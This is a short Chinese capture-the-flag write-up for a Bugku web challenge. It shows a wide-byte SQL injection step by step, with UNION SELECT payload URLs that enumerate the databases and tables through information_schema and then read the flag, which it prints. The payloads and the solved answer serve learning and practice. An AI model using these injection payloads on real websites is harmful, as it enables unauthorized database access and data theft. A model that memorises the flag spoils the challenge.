CTF天天练:web之“sql注入”

每天一道,逐步提升,持之以恒,贵在坚持

该题为bugku的web题

点开网址后,查看源代码,发现gb2312,可能是宽字节注入

进行宽字节注入

http://103.238.227.13:10083/?id=0%bf%27 union select 1,2 --+

获取所有数据库的名称

http://103.238.227.13:10083/?id=0%bf%27 union select 1,group_concat(schema_name) from information_schema.schemata --+

只有两个库,一个系统的,一个sql5,判断flag是放在sql5里的

获取sql5数据库的表

http://103.238.227.13:10083/?id=0%bf%27 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+

发现只有两个表,一个是key,一个是test,按照提示,查询key表的 string字段

http://103.238.227.13:10083/?id=0%bf%27 union select 1,string from sql5.key where id=1 --+

flag为 54f3320dc261f313ba712eb3f13a1f6d

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180806A1USJA00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券